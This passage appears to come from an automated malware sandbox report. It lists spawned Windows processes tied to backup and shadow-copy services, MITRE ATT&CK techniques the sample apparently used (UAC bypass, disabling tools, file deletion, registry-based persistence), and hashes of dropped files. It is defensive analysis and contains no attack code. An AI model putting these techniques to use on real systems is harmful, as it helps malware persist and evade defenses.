- Modifies registry class
PID:4580
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:9836
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:10208
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:23296
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:19476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 15824 -ip 158241⤵PID:16016
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD5df8db7306bc4fa4745c84840d886e838
SHA1b18217911fab8cef7ba8d8abaf5b9415900700e8
SHA25626163743ef189f18394f067962882c463f89bfa239ae0e331e5640812f150634
SHA51214201c4d6c23736c4406bd73b024378f620cd7fe5a5510750e45519b64adaf7744c4eec11b8185cec104936ac73409d70eb2f2e8361820740b2a9cbc01b19fbf
-
Filesize
684B
MD5e33de4f0b8380e31b5632500c2d0a904
SHA13ec7f12bbe6d3a22c46e35ec15c3ad67c8f0341f
SHA25614e8b76f73e8ac0388937a1927b4af6e2a33f3b4a8bd33b0fa59e2f94b8a6db1
SHA5128a721d5f3746b60718c6567b144f1f793c91903f53e360f4fcd0c358946674053116a81134112779cf63c7eaf401e30170082e057d3b439099112362d67415c0
-
Filesize
1KB
MD55c27d8098a623531502b44c0e82d7485
SHA1fc85567e309bc0066fc96db99d2c1f1453e92574
SHA256c8c67a5554c9aefc4b3ee2c4afcc599e732edfb56b5f5928186a726e76294c6b
SHA512a400b3afe77eb7b3e1af119fd5dd743e079afb0cf906c20f805f12bc84698ecb8ba5c8bcb49e4f12bc88a8d4750816cfd77ba0064f3a707585b15bb7b18c8763